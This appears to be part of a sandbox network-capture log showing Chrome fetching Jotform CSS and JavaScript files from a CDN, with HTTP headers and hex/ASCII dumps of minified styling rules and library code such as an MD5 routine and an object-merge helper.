                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC1369INData Raw: 2d 67 6c 3a 6e 6f 74 28 2e 78 63 6c 2d 73 71 75 61 72 65 2d 62 75 74 74 6f 6e 29 20 73 76 67 2c 2e 6a 4e 65 77 48 65 61 64 65 72 2d 61 63 63 6f 75 6e 74 42 6f 78 20 2e 62 75 74 74 6f 6e 2d 6d 73 3a 6e 6f 74 28 2e 78 63 6c 2d 73 71 75 61 72 65 2d 62 75 74 74 6f 6e 29 20 73 76 67 2c 2e 6a 4e 65 77 48 65 61 64 65 72 2d 61 63 63 6f 75 6e 74 42 6f 78 20 2e 62 75 74 74 6f 6e 2d 66 62 3a 6e 6f 74 28 2e 78 63 6c 2d 73 71 75 61 72 65 2d 62 75 74 74 6f 6e 29 20 73 76 67 2c 2e 6a 4e 65 77 48 65 61 64 65 72 2d 61 63 63 6f 75 6e 74 42 6f 78 20 2e 78 63 6c 2d 62 75 74 74 6f 6e 2d 66 62 20 73 76 67 2c 2e 6a 4e 65 77 48 65 61 64 65 72 2d 61 63 63 6f 75 6e 74 42 6f 78 20 2e 78 63 6c 2d 62 75 74 74 6f 6e 2d 61 70 20 73 76 67 2c 2e 6a 4e 65 77 48 65 61 64 65 72 2d 61 63 63
                                                                                                                                                                                                                                            Data Ascii: -gl:not(.xcl-square-button) svg,.jNewHeader-accountBox .button-ms:not(.xcl-square-button) svg,.jNewHeader-accountBox .button-fb:not(.xcl-square-button) svg,.jNewHeader-accountBox .xcl-button-fb svg,.jNewHeader-accountBox .xcl-button-ap svg,.jNewHeader-acc
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC1369INData Raw: 65 72 2d 61 63 63 6f 75 6e 74 42 6f 78 20 2e 78 63 6c 2d 63 77 2e 73 6f 63 69 61 6c 2d 6c 6f 67 69 6e 2d 35 2d 69 74 65 6d 20 62 75 74 74 6f 6e 2e 78 63 6c 2d 73 71 75 61 72 65 2d 62 75 74 74 6f 6e 7b 77 69 64 74 68 3a 36 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 36 30 70 78 3b 68 65 69 67 68 74 3a 36 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 31 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 36 70 78 7d 2e 6a 4e 65 77 48 65 61 64 65 72 2d 61 63 63 6f 75 6e 74 42 6f 78 20 2e 78 63 6c 2d 63 77 2e 73 6f 63 69 61 6c 2d 6c 6f 67 69 6e 2d 35 2d 69 74 65 6d 20 62 75 74 74 6f 6e 2e 78 63 6c 2d 73 71 75 61 72 65 2d 62 75 74 74 6f 6e 20 73 76 67 7b 77 69 64 74 68 3a 32 38 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 32 38 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74
                                                                                                                                                                                                                                            Data Ascii: er-accountBox .xcl-cw.social-login-5-item button.xcl-square-button{width:60px;min-width:60px;height:60px;font-size:11px;line-height:16px}.jNewHeader-accountBox .xcl-cw.social-login-5-item button.xcl-square-button svg{width:28px;max-height:28px;margin-bott
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC1369INData Raw: 72 64 65 72 2d 72 61 64 69 75 73 3a 34 70 78 3b 77 69 64 74 68 3a 31 38 70 78 3b 68 65 69 67 68 74 3a 31 38 70 78 3b 74 6f 70 3a 2d 36 70 78 3b 6c 65 66 74 3a 63 61 6c 63 28 35 30 25 20 2d 20 39 70 78 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 34 35 64 65 67 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 30 20 33 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 35 29 7d 2e 6a 4e 65 77 48 65 61 64 65 72 2d 61 63 63 6f 75 6e 74 42 6f 78 3a 62 65 66 6f 72 65 7b 72 69 67 68 74 3a 31 37 70 78 7d 68 74 6d 6c 5b 64 69 72 3d 72 74 6c 5d 20 2e 6a 4e 65 77 48 65 61 64 65 72 2d 61 63 63 6f 75 6e 74 42 6f 78 3a 62 65 66 6f 72 65 7b 6c 65 66 74 3a 31 37 70 78 3b 72 69 67 68 74 3a 69 6e 69 74 69 61 6c 7d 62 6f 64 79 5b 64 69 72 3d 72 74 6c 5d 20 2e 6a 4e 65
                                                                                                                                                                                                                                            Data Ascii: rder-radius:4px;width:18px;height:18px;top:-6px;left:calc(50% - 9px);transform:rotate(45deg);box-shadow:0 0 3px rgba(0,0,0,.25)}.jNewHeader-accountBox:before{right:17px}html[dir=rtl] .jNewHeader-accountBox:before{left:17px;right:initial}body[dir=rtl] .jNe
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC1369INData Raw: 78 20 2e 6a 4e 65 77 48 65 61 64 65 72 2d 75 73 65 72 41 63 63 6f 75 6e 74 42 6f 78 2d 75 73 65 72 4e 61 6d 65 7b 63 6f 6c 6f 72 3a 23 30 61 31 35 35 31 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 77 69 64 74 68 3a 63 61 6c 63 28 31 30 30 25 20 2d 20 31 36 70 78 29 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 38 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 30 70 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 2e 6a 4e 65 77 48 65 61 64 65 72 2d 75 73 65 72 41 63 63 6f 75 6e 74 42 6f 78 20 2e 6a
                                                                                                                                                                                                                                            Data Ascii: x .jNewHeader-userAccountBox-userName{color:#0a1551;white-space:nowrap;align-items:center;width:calc(100% - 16px);margin-right:8px;font-size:14px;font-weight:500;line-height:20px;display:flex;position:relative;overflow:hidden}.jNewHeader-userAccountBox .j
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC1369INData Raw: 6e 74 54 79 70 65 2e 70 6c 61 6e 4e 61 6d 65 2d 62 72 6f 6e 7a 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 36 33 33 63 7d 2e 6a 4e 65 77 48 65 61 64 65 72 2d 75 73 65 72 41 63 63 6f 75 6e 74 42 6f 78 20 2e 6a 4e 65 77 48 65 61 64 65 72 2d 75 73 65 72 41 63 63 6f 75 6e 74 42 6f 78 2d 61 63 63 6f 75 6e 74 54 79 70 65 2e 70 6c 61 6e 4e 61 6d 65 2d 73 69 6c 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 39 36 33 66 66 7d 2e 6a 4e 65 77 48 65 61 64 65 72 2d 75 73 65 72 41 63 63 6f 75 6e 74 42 6f 78 20 2e 6a 4e 65 77 48 65 61 64 65 72 2d 75 73 65 72 41 63 63 6f 75 6e 74 42 6f 78 2d 61 63 63 6f 75 6e 74 54 79 70 65 2e 70 6c 61 6e 4e 61 6d 65 2d 67 6f 6c 64 7b 63 6f 6c 6f 72 3a 23 32 38 32 66 34 32 3b 62 61 63 6b 67 72
                                                                                                                                                                                                                                            Data Ascii: ntType.planName-bronze{background-color:#ff633c}.jNewHeader-userAccountBox .jNewHeader-userAccountBox-accountType.planName-silver{background-color:#2963ff}.jNewHeader-userAccountBox .jNewHeader-userAccountBox-accountType.planName-gold{color:#282f42;backgr
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC1369INData Raw: 20 2e 6a 4e 65 77 48 65 61 64 65 72 2d 61 76 61 74 61 72 43 6f 6e 74 61 69 6e 65 72 3a 62 65 66 6f 72 65 2c 2e 6a 4e 65 77 48 65 61 64 65 72 2d 61 76 61 74 61 72 2e 62 66 32 30 32 31 2d 61 76 61 74 61 72 20 2e 6a 4e 65 77 48 65 61 64 65 72 2d 61 76 61 74 61 72 43 6f 6e 74 61 69 6e 65 72 3a 61 66 74 65 72 7b 63 6f 6e 74 65 6e 74 3a 22 22 3b 7a 2d 69 6e 64 65 78 3a 2d 31 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 32 30 32 37 33 37 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 2d 38 70 78 3b 72 69 67 68 74 3a 2d 38 70 78 7d 2e 6a 4e 65 77 48 65 61 64 65 72 2d 61 76 61 74 61 72 2e 62 66 32 30 32 31 2d 61 76 61 74 61 72 20 2e 6a 4e 65 77 48 65 61 64 65 72 2d 61 76 61 74 61 72 43 6f 6e 74 61 69 6e 65 72 3a 62 65 66 6f 72 65 7b 62 6f 72 64
                                                                                                                                                                                                                                            Data Ascii: .jNewHeader-avatarContainer:before,.jNewHeader-avatar.bf2021-avatar .jNewHeader-avatarContainer:after{content:"";z-index:-1;background:#202737;position:absolute;left:-8px;right:-8px}.jNewHeader-avatar.bf2021-avatar .jNewHeader-avatarContainer:before{bord


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            51192.168.2.1749767104.22.72.814435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC596OUTGET /s/portal/674ac14411e/static/css/PublicAppContainer.0eeb5429.chunk.css HTTP/1.1
                                                                                                                                                                                                                                            Host: cdn03.jotfor.ms
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: style
                                                                                                                                                                                                                                            Referer: https://eu.jotform.com/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC420INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:15 GMT
                                                                                                                                                                                                                                            Content-Type: text/css; charset=utf-8
                                                                                                                                                                                                                                            Content-Length: 4096
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            expires: Fri, 10 Jan 2025 13:21:17 GMT
                                                                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                            last-modified: Fri, 10 Jan 2025 12:20:44 GMT
                                                                                                                                                                                                                                            etag: "51592cc10dc5512916c14764fbc673d6"
                                                                                                                                                                                                                                            x-store: gcs
                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                            Age: 277
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb62d7d5d4343-EWR
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC949INData Raw: 2e 6c 69 6e 6b 2d 74 68 75 6d 6e 61 69 6c 2d 77 72 61 70 70 65 72 7b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 7d 2e 6c 69 6e 6b 2d 74 68 75 6d 6e 61 69 6c 2d 77 72 61 70 70 65 72 20 2e 6c 69 6e 6b 54 68 75 6d 62 6e 61 69 6c 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 32 70 78 7d 2e 6a 66 4f 76 65 72 66 6c 6f 77 61 62 6c 65 4c 69 73 74 7b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 2e 6a 66 4f 76 65 72 66 6c 6f 77 61 62 6c 65 4c 69 73 74 2d 69 74 65 6d 7b 66 6c 65 78 2d 73 68 72 69 6e 6b 3a 31 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65
                                                                                                                                                                                                                                            Data Ascii: .link-thumnail-wrapper{justify-content:center;align-items:center;display:flex}.link-thumnail-wrapper .linkThumbnail{border-radius:2px}.jfOverflowableList{flex-wrap:wrap;display:flex;overflow:hidden}.jfOverflowableList-item{flex-shrink:1;justify-content:ce
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC1369INData Raw: 6d 2d 70 61 72 61 67 72 61 70 68 20 70 7b 6d 61 72 67 69 6e 3a 72 65 76 65 72 74 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 72 65 76 65 72 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 72 65 76 65 72 74 7d 2e 69 74 65 6d 2d 70 61 72 61 67 72 61 70 68 20 61 7b 63 6f 6c 6f 72 3a 72 65 76 65 72 74 7d 2e 69 74 65 6d 2d 70 61 72 61 67 72 61 70 68 3a 3a 2d 77 65 62 6b 69 74 2d 73 63 72 6f 6c 6c 62 61 72 7b 68 65 69 67 68 74 3a 31 30 70 78 7d 2e 69 74 65 6d 2d 70 61 72 61 67 72 61 70 68 3a 3a 2d 77 65 62 6b 69 74 2d 73 63 72 6f 6c 6c 62 61 72 2d 74 68 75 6d 62 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 30 2c 30 2c 30 2c 2e 33 29 3b 62 6f 72 64 65 72 3a 32 70 78 20 73 6f 6c 69 64 20 23 66 66 66 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 38 70 78 7d
                                                                                                                                                                                                                                            Data Ascii: m-paragraph p{margin:revert;font-weight:revert;font-size:revert}.item-paragraph a{color:revert}.item-paragraph::-webkit-scrollbar{height:10px}.item-paragraph::-webkit-scrollbar-thumb{background-color:rgba(0,0,0,.3);border:2px solid #fff;border-radius:8px}
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC1369INData Raw: 32 70 78 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 34 38 30 70 78 29 7b 2e 6a 66 42 72 61 6e 64 69 6e 67 46 6f 6f 74 65 72 2d 62 72 61 6e 64 69 6e 67 2d 73 76 67 7b 77 69 64 74 68 3a 38 39 70 78 3b 68 65 69 67 68 74 3a 31 36 70 78 7d 7d 2e 6a 66 42 72 61 6e 64 69 6e 67 46 6f 6f 74 65 72 2d 61 70 70 4e 61 6d 65 7b 62 6f 72 64 65 72 2d 6c 65 66 74 3a 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 32 35 35 2c 32 35 35 2c 32 35 35 2c 2e 34 34 29 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 30 70 78 3b 70 61 64 64 69 6e 67 3a 34 70 78 20 31 30 70 78 20 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77
                                                                                                                                                                                                                                            Data Ascii: 2px;display:block}@media screen and (max-width:480px){.jfBrandingFooter-branding-svg{width:89px;height:16px}}.jfBrandingFooter-appName{border-left:1px solid rgba(255,255,255,.44);align-items:center;margin-left:10px;padding:4px 10px 0;font-size:14px;font-w
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC409INData Raw: 36 70 78 20 73 6f 6c 69 64 20 23 66 38 66 38 66 38 3b 62 6f 72 64 65 72 2d 6c 65 66 74 3a 36 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 72 64 65 72 2d 72 69 67 68 74 3a 36 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 36 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 62 6f 74 74 6f 6d 3a 2d 35 70 78 3b 72 69 67 68 74 3a 31 30 33 70 78 7d 2e 61 64 64 54 6f 43 61 72 74 42 74 6e 7b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 63 61 70 69 74 61 6c 69 7a 65 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 61 31 35 35 31 3b 62 6f 72 64 65 72 3a 30 3b 62 6f 72 64 65 72 2d 72 61
                                                                                                                                                                                                                                            Data Ascii: 6px solid #f8f8f8;border-left:6px solid transparent;border-right:6px solid transparent;margin-left:-6px;position:absolute;bottom:-5px;right:103px}.addToCartBtn{cursor:pointer;text-transform:capitalize;color:#fff;background-color:#0a1551;border:0;border-ra


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            52192.168.2.1749762104.22.72.814435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC560OUTGET /s/portal/674ac14411e/static/js/4646.d3fc3085.js HTTP/1.1
                                                                                                                                                                                                                                            Host: cdn03.jotfor.ms
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                                                            Referer: https://eu.jotform.com/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC429INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:15 GMT
                                                                                                                                                                                                                                            Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                            Content-Length: 188877
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            expires: Fri, 10 Jan 2025 13:21:17 GMT
                                                                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                            last-modified: Fri, 10 Jan 2025 12:20:44 GMT
                                                                                                                                                                                                                                            etag: "dc7d4d348fe1f99af4ac06d2a42b5088"
                                                                                                                                                                                                                                            x-store: gcs
                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                            Age: 277
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb62d7af2c46d-EWR
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC940INData Raw: 2f 2a 21 20 46 6f 72 20 6c 69 63 65 6e 73 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 73 65 65 20 34 36 34 36 2e 64 33 66 63 33 30 38 35 2e 6a 73 2e 4c 49 43 45 4e 53 45 2e 74 78 74 20 2a 2f 0a 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 65 2e 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64
                                                                                                                                                                                                                                            Data Ascii: /*! For license information please see 4646.d3fc3085.js.LICENSE.txt */!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugId
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC1369INData Raw: 3e 39 3c 3c 34 29 5d 3d 74 3b 76 61 72 20 70 3d 31 37 33 32 35 38 34 31 39 33 2c 64 3d 2d 32 37 31 37 33 33 38 37 39 2c 66 3d 2d 31 37 33 32 35 38 34 31 39 34 2c 6d 3d 32 37 31 37 33 33 38 37 38 3b 66 6f 72 28 6e 3d 30 3b 6e 3c 65 2e 6c 65 6e 67 74 68 3b 6e 2b 3d 31 36 29 63 3d 70 2c 6c 3d 64 2c 75 3d 66 2c 68 3d 6d 2c 70 3d 69 28 70 2c 64 2c 66 2c 6d 2c 65 5b 6e 5d 2c 37 2c 2d 36 38 30 38 37 36 39 33 36 29 2c 6d 3d 69 28 6d 2c 70 2c 64 2c 66 2c 65 5b 6e 2b 31 5d 2c 31 32 2c 2d 33 38 39 35 36 34 35 38 36 29 2c 66 3d 69 28 66 2c 6d 2c 70 2c 64 2c 65 5b 6e 2b 32 5d 2c 31 37 2c 36 30 36 31 30 35 38 31 39 29 2c 64 3d 69 28 64 2c 66 2c 6d 2c 70 2c 65 5b 6e 2b 33 5d 2c 32 32 2c 2d 31 30 34 34 35 32 35 33 33 30 29 2c 70 3d 69 28 70 2c 64 2c 66 2c 6d 2c 65 5b 6e
                                                                                                                                                                                                                                            Data Ascii: >9<<4)]=t;var p=1732584193,d=-271733879,f=-1732584194,m=271733878;for(n=0;n<e.length;n+=16)c=p,l=d,u=f,h=m,p=i(p,d,f,m,e[n],7,-680876936),m=i(m,p,d,f,e[n+1],12,-389564586),f=i(f,m,p,d,e[n+2],17,606105819),d=i(d,f,m,p,e[n+3],22,-1044525330),p=i(p,d,f,m,e[n
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC1369INData Raw: 5d 2c 31 31 2c 31 32 37 32 38 39 33 33 35 33 29 2c 66 3d 6f 28 66 2c 6d 2c 70 2c 64 2c 65 5b 6e 2b 37 5d 2c 31 36 2c 2d 31 35 35 34 39 37 36 33 32 29 2c 64 3d 6f 28 64 2c 66 2c 6d 2c 70 2c 65 5b 6e 2b 31 30 5d 2c 32 33 2c 2d 31 30 39 34 37 33 30 36 34 30 29 2c 70 3d 6f 28 70 2c 64 2c 66 2c 6d 2c 65 5b 6e 2b 31 33 5d 2c 34 2c 36 38 31 32 37 39 31 37 34 29 2c 6d 3d 6f 28 6d 2c 70 2c 64 2c 66 2c 65 5b 6e 5d 2c 31 31 2c 2d 33 35 38 35 33 37 32 32 32 29 2c 66 3d 6f 28 66 2c 6d 2c 70 2c 64 2c 65 5b 6e 2b 33 5d 2c 31 36 2c 2d 37 32 32 35 32 31 39 37 39 29 2c 64 3d 6f 28 64 2c 66 2c 6d 2c 70 2c 65 5b 6e 2b 36 5d 2c 32 33 2c 37 36 30 32 39 31 38 39 29 2c 70 3d 6f 28 70 2c 64 2c 66 2c 6d 2c 65 5b 6e 2b 39 5d 2c 34 2c 2d 36 34 30 33 36 34 34 38 37 29 2c 6d 3d 6f 28
                                                                                                                                                                                                                                            Data Ascii: ],11,1272893353),f=o(f,m,p,d,e[n+7],16,-155497632),d=o(d,f,m,p,e[n+10],23,-1094730640),p=o(p,d,f,m,e[n+13],4,681279174),m=o(m,p,d,f,e[n],11,-358537222),f=o(f,m,p,d,e[n+3],16,-722521979),d=o(d,f,m,p,e[n+6],23,76029189),p=o(p,d,f,m,e[n+9],4,-640364487),m=o(
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC1369INData Raw: 7b 72 65 74 75 72 6e 20 75 6e 65 73 63 61 70 65 28 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 64 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6c 28 63 28 75 28 65 29 2c 38 2a 65 2e 6c 65 6e 67 74 68 29 29 7d 28 70 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 72 2c 6e 2c 69 3d 75 28 65 29 2c 73 3d 5b 5d 2c 6f 3d 5b 5d 3b 66 6f 72 28 73 5b 31 35 5d 3d 6f 5b 31 35 5d 3d 76 6f 69 64 20 30 2c 69 2e 6c 65 6e 67 74 68 3e 31 36 26 26 28 69 3d 63 28 69 2c 38 2a 65 2e 6c 65 6e 67 74 68 29 29 2c 72 3d 30 3b 72 3c 31 36 3b 72 2b 3d 31 29 73 5b 72 5d 3d 39 30 39 35 32 32 34 38 36
                                                                                                                                                                                                                                            Data Ascii: {return unescape(encodeURIComponent(e))}function d(e){return function(e){return l(c(u(e),8*e.length))}(p(e))}function f(e,t){return function(e,t){var r,n,i=u(e),s=[],o=[];for(s[15]=o[15]=void 0,i.length>16&&(i=c(i,8*e.length)),r=0;r<16;r+=1)s[r]=909522486
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC1369INData Raw: 65 5b 74 5d 2c 72 29 7d 29 29 2c 73 28 74 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 73 29 7b 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 6f 28 65 2c 74 29 26 26 21 28 4f 62 6a 65 63 74 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 65 2c 74 29 26 26 4f 62 6a 65 63 74 2e 70 72 6f 70 65 72 74 79 49 73 45 6e 75 6d 65 72 61 62 6c 65 2e 63 61 6c 6c 28 65 2c 74 29 29 7d 29 28 65 2c 73 29 7c 7c 28 6f 28 65 2c 73 29 26 26 72 2e 69 73 4d 65 72 67 65 61 62 6c 65 4f 62 6a 65 63 74 28 74 5b 73 5d 29 3f 69 5b 73 5d 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 21 74 2e 63 75 73 74 6f 6d 4d 65 72 67 65 29 72 65 74 75 72 6e 20 63 3b 76 61 72 20 72 3d 74 2e 63 75 73 74 6f 6d 4d 65 72 67 65 28 65 29 3b 72 65
                                                                                                                                                                                                                                            Data Ascii: e[t],r)})),s(t).forEach((function(s){(function(e,t){return o(e,t)&&!(Object.hasOwnProperty.call(e,t)&&Object.propertyIsEnumerable.call(e,t))})(e,s)||(o(e,s)&&r.isMergeableObject(t[s])?i[s]=function(e,t){if(!t.customMerge)return c;var r=t.customMerge(e);re
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC1369INData Raw: 69 65 6e 74 22 2c 22 74 65 78 74 50 61 74 68 22 5d 2e 6d 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 5b 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 65 5d 7d 29 29 29 2c 74 2e 61 74 74 72 69 62 75 74 65 4e 61 6d 65 73 3d 6e 65 77 20 4d 61 70 28 5b 22 64 65 66 69 6e 69 74 69 6f 6e 55 52 4c 22 2c 22 61 74 74 72 69 62 75 74 65 4e 61 6d 65 22 2c 22 61 74 74 72 69 62 75 74 65 54 79 70 65 22 2c 22 62 61 73 65 46 72 65 71 75 65 6e 63 79 22 2c 22 62 61 73 65 50 72 6f 66 69 6c 65 22 2c 22 63 61 6c 63 4d 6f 64 65 22 2c 22 63 6c 69 70 50 61 74 68 55 6e 69 74 73 22 2c 22 64 69 66 66 75 73 65 43 6f 6e 73 74 61 6e 74 22 2c 22 65 64 67 65 4d 6f 64 65 22 2c 22 66 69 6c 74 65 72 55 6e 69 74 73 22 2c 22 67 6c 79 70 68 52 65 66 22 2c 22 67 72 61 64
